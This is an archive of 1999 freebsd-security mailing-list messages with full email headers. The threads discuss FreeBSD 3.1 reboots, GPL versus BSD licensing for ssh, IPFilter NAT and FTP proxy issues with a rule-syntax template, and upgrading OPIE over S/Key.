- Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 11: 9:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from kiev.sovam.com (kiev.sovam.com [194.186.143.7]) by hub.freebsd.org (Postfix) with ESMTP id 92E5515057 for ; Wed, 14 Apr 1999 11:09:42 -0700 (PDT) (envelope-from doka@kiev.sovam.com) Received: from doka (helo=localhost) by kiev.sovam.com with local-esmtp (Exim 2.12 #1) id 10XU41-000FHE-00; Wed, 14 Apr 1999 21:07:05 +0300 Date: Wed, 14 Apr 1999 21:07:04 +0300 (EEST) From: Vladimir Litovka To: freebsd-security@FreeBSD.ORG Cc: Theodore Rush Subject: Re: FreeBSD 3.1 Reboots In-Reply-To: <11039.924112899@zippy.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! On Wed, 14 Apr 1999, Jordan K. Hubbard wrote: > > Now as of 50 minutes ago ...suddenly the machine REBOOTS. > > Without any details, it's impossible to say. The most possible cause - hardware problems. Check in order RAM, cache, motherboard, CPU, hardware's vendor. -- Yours sincerely, Vladimir Litovka, hostmaster of Sovam Teleport Kiev To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 13:18:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from xkis.kis.ru (xkis.kis.ru [195.98.32.200]) by hub.freebsd.org (Postfix) with ESMTP id EB4CF157ED for ; Wed, 14 Apr 1999 13:18:19 -0700 (PDT) (envelope-from dv@dv.ru) Received: from localhost (dv@localhost) by xkis.kis.ru (8.9.3/8.9.0) with SMTP id AAA26804; Thu, 15 Apr 1999 00:15:28 +0400 (MSD) Date: Thu, 15 Apr 1999 00:15:28 +0400 (MSD) From: Dmitry Valdov X-Sender: dv@xkis.kis.ru To: "Jordan K. 
Hubbard"
Cc: Theodore Rush , freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD 3.1 Reboots
In-Reply-To: <11039.924112899@zippy.cdrom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 14 Apr 1999, Jordan K. Hubbard wrote:

> Date: Wed, 14 Apr 1999 11:01:39 -0700
> From: "Jordan K. Hubbard"
> To: Theodore Rush
> Cc: freebsd-security@FreeBSD.ORG
> Subject: Re: FreeBSD 3.1 Reboots
>
> > Now as of 50 minutes ago ...suddenly the machine REBOOTS.
>
> Without any details, it's impossible to say.
>

It's possible. There is a problem in 3.1-RELEASE. It reboots 1-2 times a day (in heavy load) because of a VM error. The solution is to upgrade to 3.1-STABLE.

Dmitry.

From owner-freebsd-security Wed Apr 14 13:38:38 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id E950A15875 for ; Wed, 14 Apr 1999 13:38:35 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id OAA19198; Wed, 14 Apr 1999 14:35:42 -0600 (MDT)
Message-Id: <4.2.0.32.19990414142800.00d14990@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta)
Date: Wed, 14 Apr 1999 14:34:09 -0600
To: Dmitry Valdov
From: Brett Glass
Subject: Re: FreeBSD 3.1 Reboots
Cc: Theodore Rush , freebsd-security@FreeBSD.ORG
In-Reply-To:
References: <11039.924112899@zippy.cdrom.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

There was a similar problem in 2.2.7 when it was compiled with certain kernel configurations.
I found that removing the ATAPI and ATAPI_STATIC options caused many VM errors. Adding them back made the system stable. It took us a long time to discover this. 3.1-RELEASE was the first non-experimental point release in the 3.X tree. It always pays to wait for the second one before installing the OS on mission-critical systems. We're installing 3.1 on a few workstations, but will wait for 3.2-RELEASE (and will delay installing it for two weeks to make sure that there are no egregious problems) before moving away from 2.2.8 on the servers. Yep, I know this sounds incredibly paranoid, but a sysadmin has to be. --Brett At 12:15 AM 4/15/99 +0400, Dmitry Valdov wrote: >On Wed, 14 Apr 1999, Jordan K. Hubbard wrote: > >> Date: Wed, 14 Apr 1999 11:01:39 -0700 >> From: "Jordan K. Hubbard" >> To: Theodore Rush >> Cc: freebsd-security@FreeBSD.ORG >> Subject: Re: FreeBSD 3.1 Reboots >> >> > Now as of 50 minutes ago ...suddenly the machine REBOOTS. >> >> Without any details, it's impossible to say. >> > >It Possible. >There is a problem in 3.1RELEASE. It reboots 1-2 times a day (in heavy >load) because of VM error. >The solution is to upgrade to 3.1Stable. > >Dmitry. 
> > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 14:41:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.226]) by hub.freebsd.org (Postfix) with ESMTP id D651E15824 for ; Wed, 14 Apr 1999 14:41:02 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id RAA04168; Wed, 14 Apr 1999 17:38:51 -0400 (EDT) From: "Allen Smith" Message-Id: <9904141738.ZM4166@beatrice.rutgers.edu> Date: Wed, 14 Apr 1999 17:38:50 -0400 In-Reply-To: Brett Glass "Re: ssh protocol [was: Interesting problem: chowning files sent via FTP]" (Apr 12, 5:13pm) References: <4.2.0.32.19990412152634.00ce0bb0@localhost> <4.2.0.32.19990412160742.00c35dc0@localhost> X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: Brett Glass , "Gregory P. Smith" Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP] Cc: Igor Roshchin , security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Apr 12, 5:13pm, Brett Glass (possibly) wrote: > Berkeley licensing would also allow cryptographers to review the code, > but would have the advantage that people could incorporate it not > just as a library but as an integral part of a product. Umm... Berkeley licensing means that people can review the _original_ code. It doesn't mean that people can review the code that is actually used in the product. > Also, Richard Stallman has pretty much decreed that the LGPL is > history as far as FSF and "GNU" projects are concerned. 
> They'll use the GPL on their libraries in an attempt to force > companies to give up their work. This will backfire, of course, > and we'll wind up with incompatible implementations. I agree that this qualifies as stupid. -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 14:44: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.226]) by hub.freebsd.org (Postfix) with ESMTP id A454415824 for ; Wed, 14 Apr 1999 14:44:06 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id RAA04182; Wed, 14 Apr 1999 17:41:34 -0400 (EDT) From: "Allen Smith" Message-Id: <9904141741.ZM4180@beatrice.rutgers.edu> Date: Wed, 14 Apr 1999 17:41:34 -0400 In-Reply-To: 0x1c "Re: ssh protocol [was: Interesting problem: chowning files sent via FTP]" (Apr 12, 8:15pm) References: X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: 0x1c Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP] Cc: Brett Glass , "Gregory P. Smith" , Igor Roshchin , security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Apr 12, 8:15pm, 0x1c (possibly) wrote: > On Mon, 12 Apr 1999, Allen Smith wrote: > > > On Apr 12, 4:30pm, Brett Glass (possibly) wrote: > > > A GPLed implementation would be a bad idea, because it would prevent > > > the code from being incorporated into commercial products and thus > > > discourage standardization. This is one situation in which BSD-type > > > licensing would be infinitely preferable. > > > > Actually, what would be preferable is some form of GNU _library_ > > license. 
I'm not willing to trust an encryption program unless I > > know independent cryptographers have reviewed the code. For that matter, I'm not willing to trust _anything_ on security unless the code is available... this is one reason we're using FreeBSD for a firewall. > How does the licence (gpl, lgpl, or bsd) have anything to do with > independent cryptographers reviewing the code? The only crucial > requirement is that the relevant source be available for analysis. A gpl or lgpl license mandates the widest possible availability for review of the code. -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 17:14: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from kitsune.swcp.com (swcp.com [198.59.115.2]) by hub.freebsd.org (Postfix) with ESMTP id 155D21525F for ; Wed, 14 Apr 1999 17:13:58 -0700 (PDT) (envelope-from synk@swcp.com) Received: (from synk@localhost) by kitsune.swcp.com (8.8.8/1.2.3) id SAA02517; Wed, 14 Apr 1999 18:11:34 -0600 (MDT) Message-Id: <199904150011.SAA02517@kitsune.swcp.com> Subject: Re: IPFilter? To: jobaldwi@vt.edu (John Baldwin) Date: Wed, 14 Apr 1999 18:11:34 -0600 (MDT) From: "Brendan Conoboy" Cc: freebsd-security@freebsd.org In-Reply-To: from "John Baldwin" at Apr 14, 99 03:43:17 am X-Mailer: ELM [version 2.4 PL25 PGP3 *ALPHA*] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > If you read the FAQ, and follow question 10.6. Does FreeBSD support NAT or > Masquerading, it has a link to the natd manpage: > http://www.freebsd.org/cgi/man.cgi?natd. > > The section "Running NATD" gives step by step instructions on getting NAT up > and running. 
For manpages in general, you can go to > http://www.freebsd.org/cgi/man.cgi?manpath=FreeBSD+3.1-RELEASE > > I believe that you can use ipfw ('man ipfw' at the URL above) to do the same > stuff as IPFilter. > > John Baldwin -- http://members.freedomnet.com/~jbaldwin/ Hi John, IP Filter comes with its own NAT, entirely separate from natd. I prefer IP filter to IPFW and imagine others might as well. The original poster is right though, the documentation is severely lacking. I could write something up if there's support (IE, somebody says "hey, do the groundwork for this, I'll edit it, then throw it into the handbook"), but it wouldn't be a complete documentary on ipfilter's features. Perhaps this is still better than what is available now. Speaking of which, is anybody using ipfilter's ftp proxy successfully? I have successful kernel panics, but the delight in this is fleeting. -Brendan (synk@swcp.com) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 17:40:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from kizmiaz.dis.org (kizmiaz.dis.org [209.157.93.60]) by hub.freebsd.org (Postfix) with ESMTP id 172F214D18 for ; Wed, 14 Apr 1999 17:40:13 -0700 (PDT) (envelope-from daver@kizmiaz.dis.org) Received: (from daver@localhost) by kizmiaz.dis.org (8.9.2.Beta4/8.9.2.Beta4) id RAA18416 for freebsd-security@freebsd.org; Wed, 14 Apr 1999 17:37:52 -0700 (PDT) Date: Wed, 14 Apr 1999 17:37:52 -0700 (PDT) From: Evil Dave Message-Id: <199904150037.RAA18416@kizmiaz.dis.org> To: freebsd-security@freebsd.org Subject: OPIE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hiya folks. the version of OPIE in /usr/src/contrib/opie is version 2.31. version 2.32 was released well over a year ago. I'm told that to upgrade this (well, to put the newer minor revision in place) i need some help from someone with contrib access. any takers? 
i have a pam opie lib built from the 2.31 tree and it works, but i'd like to see the newer (again, over a year old) version put in place in case someone ever decides to make a pam module out of the newer release. i'm sure using 2.31 isnt all that bad, and it works well for me. i find it odd that s/key is supported so widely while OPIE seems ignored. Bellcore gave up s/key and the naval research labs took it over. They had to rename it so they decided on OPIE (one-time passwords in everything) and implemented md5, which, if i'm not mistaken, was not in s/key at the time. i'm not sure about s/key, did they ever implement md5? OPIE is clearly newer and better. but i'm sure i'm reciting ancient and boring history to most of you. the 2.31 version was released 3/20/1997. the 2.32 version was released 1/1/1998. thanks for your time. dave To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 19: 3:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 7C2F014F69 for ; Wed, 14 Apr 1999 19:03:31 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id UAA22224; Wed, 14 Apr 1999 20:00:45 -0600 (MDT) Message-Id: <4.2.0.32.19990414195738.0459a3a0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Wed, 14 Apr 1999 20:00:43 -0600 To: "Allen Smith" , 0x1c From: Brett Glass Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP] Cc: "Gregory P. 
Smith" , Igor Roshchin , security@FreeBSD.ORG In-Reply-To: <9904141741.ZM4180@beatrice.rutgers.edu> References: <0x1c Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 05:41 PM 4/14/99 -0400, Allen Smith wrote: >A gpl or lgpl license mandates the widest possible availability for >review of the code. No, it does not, because commercial products will not USE the code. The GPL prevents them from putting it into a commercial product. They'll have to reimplement, which means -- guess what? -- unreviewed code. The LGPL is now deprecated; no new "GNU" software will be released under that license anymore. This is because Stallman, drunk with the success of Linux, feels that he can now impose his anti-commercial agenda on the world (sigh). I think that there's a pretty good chance that BSD-licensed code will be used as-is. If it ain't broke, they won't fix it. --Brett "For every action there is an equal and opposite government program." --Bob Wells To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 19:49: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from madeline.boneyard.lawrence.ks.us (madeline.boneyard.lawrence.ks.us [24.124.33.226]) by hub.freebsd.org (Postfix) with ESMTP id 42DF714F44 for ; Wed, 14 Apr 1999 19:49:05 -0700 (PDT) (envelope-from bsd-sec@sunflower.com) Received: from madeline.boneyard.lawrence.ks.us (bsd-sec@madeline.boneyard.lawrence.ks.us [24.124.33.226]) by madeline.boneyard.lawrence.ks.us (8.9.3/8.9.3) with ESMTP id VAA23995; Wed, 14 Apr 1999 21:48:13 -0500 (CDT) Date: Wed, 14 Apr 1999 21:48:09 -0500 (CDT) From: "Stephen D. Spencer" X-Sender: bsd-sec@madeline.boneyard.lawrence.ks.us To: Brendan Conoboy Cc: John Baldwin , freebsd-security@FreeBSD.ORG Subject: Re: IPFilter? 
In-Reply-To: <199904150011.SAA02517@kitsune.swcp.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 14 Apr 1999, Brendan Conoboy wrote:

> [...]
> Speaking of which, is anybody using ipfilter's ftp proxy successfully? I
> have successful kernel panics, but the delight in this is fleeting.
>

And so it goes with the version integrated with FreeBSD (3.2.7 I believe).

I am currently running 3.2.11b4 with the ftp proxy successfully in use. (see http://cheops.anu.edu.au/~avalon/ip-filter.html)

Stephen Spencer
Lawrence, KS

Don't worry about the future. Or worry, but understand that worrying is about as effective as trying to solve an algebra equation by chewing bubble gum. -lee perry

From owner-freebsd-security Wed Apr 14 22:56:37 1999
Delivered-To: freebsd-security@freebsd.org
Received: from iisi.co.jp (ns.iisi.co.jp [203.180.102.129]) by hub.freebsd.org (Postfix) with ESMTP id 184FB152EF for ; Wed, 14 Apr 1999 22:56:34 -0700 (PDT) (envelope-from wen@iisi.co.jp)
Received: from wen (wen.iisi.co.jp [203.180.102.179]) by iisi.co.jp (8.7.3+2.6Wbeta5-NAO.1/3.4W2:19960712 183202) with SMTP id OAA03216 for ; Thu, 15 Apr 1999 14:52:50 +0900 (JST)
Message-ID: <005901be8704$d682fc40$b366b4cb@wen.iisi.co.jp>
From: "GuangChun Wen"
To:
Subject: Traffic Control in FreeBSD
Date: Thu, 15 Apr 1999 14:57:25 +0900
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-2022-jp"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.5
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi everyone:

I wonder if it is possible to use FreeBSD as a security gateway, and implement a traffic control mechanism on it in software?
I have read RFC 1633 and it seems that traffic control is usually done in the router with the help of hardware. I also heard that a Linux-based router product was on the market. What about FreeBSD? Do general Cisco routers have a traffic control function? Can anybody give me some advice?

Best Regards,

==========================================
GuangChun Wen
Software Engineer
IISI Co.,Ltd. Japan
Phone: 81-3-5287-9500
Fax: 81-3-5287-9515
==========================================

From owner-freebsd-security Wed Apr 14 23:57:45 1999
Delivered-To: freebsd-security@freebsd.org
Received: from maile.telia.com (maile.telia.com [194.22.190.16]) by hub.freebsd.org (Postfix) with ESMTP id 5492714C83 for ; Wed, 14 Apr 1999 23:57:33 -0700 (PDT) (envelope-from thomas.uhrfelt@plymovent.se)
Received: from d1o68.telia.com (root@d1o68.telia.com [62.20.138.241]) by maile.telia.com (8.8.5/8.8.8) with ESMTP id IAA24337; Thu, 15 Apr 1999 08:55:11 +0200 (CEST)
Received: from tu (t2o68p8.telia.com [62.20.138.128]) by d1o68.telia.com (8.8.8/8.8.5) with SMTP id IAA14250; Thu, 15 Apr 1999 08:55:04 +0200 (CEST)
Received: by localhost with Microsoft MAPI; Thu, 15 Apr 1999 08:51:26 +0200
Message-ID: <01BE871D.25BDF540.thomas.uhrfelt@plymovent.se>
From: Thomas Uhrfelt
Reply-To: "thomas.uhrfelt@plymovent.se"
To: "'Brendan Conoboy'"
Cc: "'freebsd-security@freebsd.org'"
Subject: SV: IPFilter?
Date: Thu, 15 Apr 1999 07:51:21 +0200
Organization: Plymovent AB
X-Mailer: Microsoft Internet-e-post/MAPI - 8.0.0.4211
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Go ahead and do the groundwork, I am sure the documenters would love to see that addition, otherwise I'll put it up as a webpage.
Regards, Thomas > Hi John, > > IP Filter comes with its own NAT, entirely separate from natd. I prefer > IP filter to IPFW and imagine others might as well. The original poster > is right though, the documentation is severely lacking. I could write > something up if there's support (IE, somebody says "hey, do the groundwork > for this, I'll edit it, then throw it into the handbook"), but it wouldn't > be a complete documentary on ipfilter's features. Perhaps this is still > better than what is available now. > > Speaking of which, is anybody using ipfilter's ftp proxy successfully? I > have successful kernel panics, but the delight in this is fleeting. > > -Brendan (synk@swcp.com) > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 15 1:10:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from kamna.i.cz (kamna.i.cz [193.85.255.30]) by hub.freebsd.org (Postfix) with SMTP id 15BF21531A for ; Thu, 15 Apr 1999 01:10:43 -0700 (PDT) (envelope-from mm@i.cz) Received: (qmail 26341 invoked from network); 15 Apr 1999 08:12:05 -0000 Received: from woody.i.cz (@193.85.255.60) by kamna.i.cz with SMTP; 15 Apr 1999 08:12:05 -0000 Content-Length: 1236 Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=iso-8859-2 Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Thu, 15 Apr 1999 10:08:15 +0200 (MET DST) Reply-To: mm@i.cz From: Martin Machacek To: freebsd-security@FreeBSD.ORG Subject: Re: IPFilter? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 15-Apr-99 Stephen D. Spencer wrote: > On Wed, 14 Apr 1999, Brendan Conoboy wrote: > >> [...] >> Speaking of which, is anybody using ipfilter's ftp proxy successfully? 
I
>> have successful kernel panics, but the delight in this is fleeting.
>>
>
> And so it goes with the version integrated with FreeBSD (3.2.7 I believe)
>
> I am current running 3.2.11b4 with the ftp proxy successfully in use.
> (see http://cheops.anu.edu.au/~avalon/ip-filter.html)

I've also had trouble using transparent proxying with IPFilter 3.2.10 and FWTK v 2 (with appropriate patches) on FreeBSD 2.2.8. In every case the ioctl on /dev/ipl trying to read the original target address failed. I've tried multiple configurations of ipnat rules with no success. I'm pretty much sure that I've tried everything reasonable. The built-in FTP proxy didn't work either, except for passive mode transfers (that was actually the reason why I was experimenting with ftp-gw from FWTK). I would very much like to use IPFilter instead of ipfw because of its (IMO) better filtering capabilities and kernel implementation of NAT, but the problem with FTP is a clear show stopper. Do you know whether it works with 3.2.11b4?

Martin
---
[PGP KeyID F3F409C4]

From owner-freebsd-security Thu Apr 15 1:30:44 1999
Delivered-To: freebsd-security@freebsd.org
Received: from amanda.qmpgmc.ac.uk (amanda.qmpgmc.ac.uk [194.81.5.1]) by hub.freebsd.org (Postfix) with ESMTP id DD90B14C30 for ; Thu, 15 Apr 1999 01:30:37 -0700 (PDT) (envelope-from greg@qmpgmc.ac.uk)
Received: from greg (gquinlan [194.81.0.56]) by amanda.qmpgmc.ac.uk (8.9.3/8.9.3) with SMTP id JAA09465; Thu, 15 Apr 1999 09:27:58 +0100 (BST)
Reply-To: "Greg Quinlan"
From: "Greg Quinlan"
To: "Dmitry Valdov" , "Jordan K. Hubbard"
Cc:
Subject: Re: FreeBSD 3.1 Reboots
Date: Mon, 19 Apr 1999 09:28:03 +0100
Message-ID: <01be8a3e$8ab0ca80$380051c2@greg.qmpgmc.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.71.1712.3
X-MimeOLE: Produced By Microsoft MimeOLE V4.71.1712.3
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Thank you ...

# Given that machine does the following:

It has 6 10/100 PCI (xl0) Network Interfaces using a SuperMicro 9 PCI, 4 ISA, PII
Does all DNS, Sendmail, Proxied Internet, NAT, IPFW, etc
Firewalls the WWW on one of its interfaces
Does NAT for two other network interfaces.
Is the DNS for nearly 2000 IP Addresses
Sends & receives around 1400 e-mails per day.
Does IP filtering to another remote network.
Does routing between yet two more interfaces.
Has two 56K PPP CHAP dialups.
and if that isn't enough does file/print sharing using Samba....

I think I'll look at 3.1-Stable as a starting point for VM!

I do not think it's the hardware... I did comprehensive tests before I installed the unit above!!

Thanks again
Greg

ps. I'd say that is a moderate load The

-----Original Message-----
From: Dmitry Valdov
To: Jordan K. Hubbard
Cc: Theodore Rush ; freebsd-security@FreeBSD.ORG
Date: 14 April 1999 21:16
Subject: Re: FreeBSD 3.1 Reboots

>
>
>On Wed, 14 Apr 1999, Jordan K. Hubbard wrote:
>
>> Date: Wed, 14 Apr 1999 11:01:39 -0700
>> From: "Jordan K. Hubbard"
>> To: Theodore Rush
>> Cc: freebsd-security@FreeBSD.ORG
>> Subject: Re: FreeBSD 3.1 Reboots
>>
>> > Now as of 50 minutes ago ...suddenly the machine REBOOTS.
>>
>> Without any details, it's impossible to say.
>>
>
>It Possible.
>There is a problem in 3.1RELEASE. It reboots 1-2 times a day (in heavy
>load) because of VM error.
>The solution is to upgrade to 3.1Stable.
>
>Dmitry.
From owner-freebsd-security Thu Apr 15 2:23:07 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id B2DC81534F for ; Thu, 15 Apr 1999 02:22:58 -0700 (PDT) (envelope-from mark@greenpeace.grondar.za)
Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.2/8.9.2) with ESMTP id LAA12738; Thu, 15 Apr 1999 11:20:27 +0200 (SAST) (envelope-from mark@greenpeace.grondar.za)
Received: from greenpeace.grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id LAA38947; Thu, 15 Apr 1999 11:20:26 +0200 (SAST) (envelope-from mark@greenpeace.grondar.za)
Message-Id: <199904150920.LAA38947@greenpeace.grondar.za>
To: Evil Dave
Cc: freebsd-security@freebsd.org
Subject: Re: OPIE
In-Reply-To: Your message of " Wed, 14 Apr 1999 17:37:52 MST." <199904150037.RAA18416@kizmiaz.dis.org>
References: <199904150037.RAA18416@kizmiaz.dis.org>
Date: Thu, 15 Apr 1999 11:20:22 +0200
From: Mark Murray
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Evil Dave wrote:

> the version of OPIE in /usr/src/contrib/opie is version 2.31. version 2.32
> was released well over a year ago. I'm told that to upgrade this (well,
> to put the newer minor revision in place) i need some help from someone
> with contrib access. any takers?

I'm happy to help!

> i have a pam opie lib built from the 2.31 tree and it works, but i'd like
> to see the newer (again, over a year old) version put in place in case
> someone ever decides to make a pam module out of the newer release. i'm sure
> using 2.31 isnt all that bad, and it works well for me.

SKey makes me nervous. I'd be happy to improve this (and add SHA as well).

> i find it odd that s/key is supported so widely while OPIE seems ignored.
> Bellcore gave up s/key and the naval research labs took it over. They had
> to rename it so they decided on OPIE (one-time passwords in everything) and
> implemented md5, which, if i'm not mistaken, was not in s/key at the time. i'm
> not sure about s/key, did they ever implement md5?

Not AFAIK.

> OPIE is clearly newer and better. but i'm sure i'm reciting ancient and boring
> history to most of you. the 2.31 version was released 3/20/1997. the 2.32
> version was released 1/1/1998.

SKey defaults to MD4, which has key collision problems that allow an attacker with moderate computing power, some time and a few sample (snooped) keys a reasonable chance at getting a workable key. MD5 and SHA are much harder to attack in this way.

M
--
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org

From owner-freebsd-security Thu Apr 15 4:10:09 1999
Delivered-To: freebsd-security@freebsd.org
Received: from bitey.cyber.com.au (james1.lnk.telstra.net [139.130.48.78]) by hub.freebsd.org (Postfix) with ESMTP id 8A37A14FDC for ; Thu, 15 Apr 1999 04:09:57 -0700 (PDT) (envelope-from tetragon@cyber.com.au)
Received: from cyber.com.au (yakko [203.7.155.163]) by bitey.cyber.com.au (8.9.2/8.9.1) with ESMTP id TAA01359 for ; Thu, 15 Apr 1999 19:53:38 +1000 (EST) (envelope-from tetragon@cyber.com.au)
Message-ID: <36ECCA8D.7EA8FFD3@cyber.com.au>
Date: Mon, 15 Mar 1999 19:53:33 +1100
From: Gavan McCormack
Organization: Searching --- 0% done. Please stand by.
X-Mailer: Mozilla 4.5 [en] (Win95; I)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: Re: IPFilter?
References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org John Baldwin wrote: > On 14-Apr-99 Thomas Uhrfelt wrote: > > I already bought the 'Building Internet Firewalls' and its a good book, and > > I got the theoretic side of building a firewall pretty much nailed down. > > What I am missing is FreeBSD specific things + IPFilter/NAT things. I am > The section "Running NATD" gives step by step instructions on getting NAT up > and running. For manpages in general, you can go to > http://www.freebsd.org/cgi/man.cgi?manpath=FreeBSD+3.1-RELEASE THis is not the NAT in ipfilter. (AFAIK.) > I believe that you can use ipfw ('man ipfw' at the URL above) to do the same > stuff as IPFilter. ipfw is definetly a different beastie to ipfilter, and is IMHO, not as comprehensive as ipfilter. IPfilter is at this time severely lacking in documentation. I've met with Darren, he is not one for documentation. :) The best thing is to check the source, if in doubt. I guess the FreeBSD dudes will rectify this by the time IPfilter becomes the default firewall for FreeBSD. I found it pretty frustrating to setup, so here is my thoughts. When I started out on IPfilter, I made a crude rule template. type dir [log] [quick] [on $if] [proto $prot] from $host/net to $host/net \ [port = $port/range] [keep state] [flags $flags] When specifying port numbers, use ' = nn', and to specify ranges use ' 1000 <> 2000' inclusive and ' 1000 >< 2000' exclusive. You can use hostnames from /etc/hosts or wherever, and also IP numbers/subnets in the form of n.n.n.n/m where the m is the netmask in decimal bits. (Ie: a netmask of 255.255.255.248 (3-bit subnet) would be 32-3, or /29.) There are a few obvious things to know too. The best way to *check* the rules, is to allow everything, and block what you are writing the rule for. Then, once you've got everything looking like it should, reverse that. 
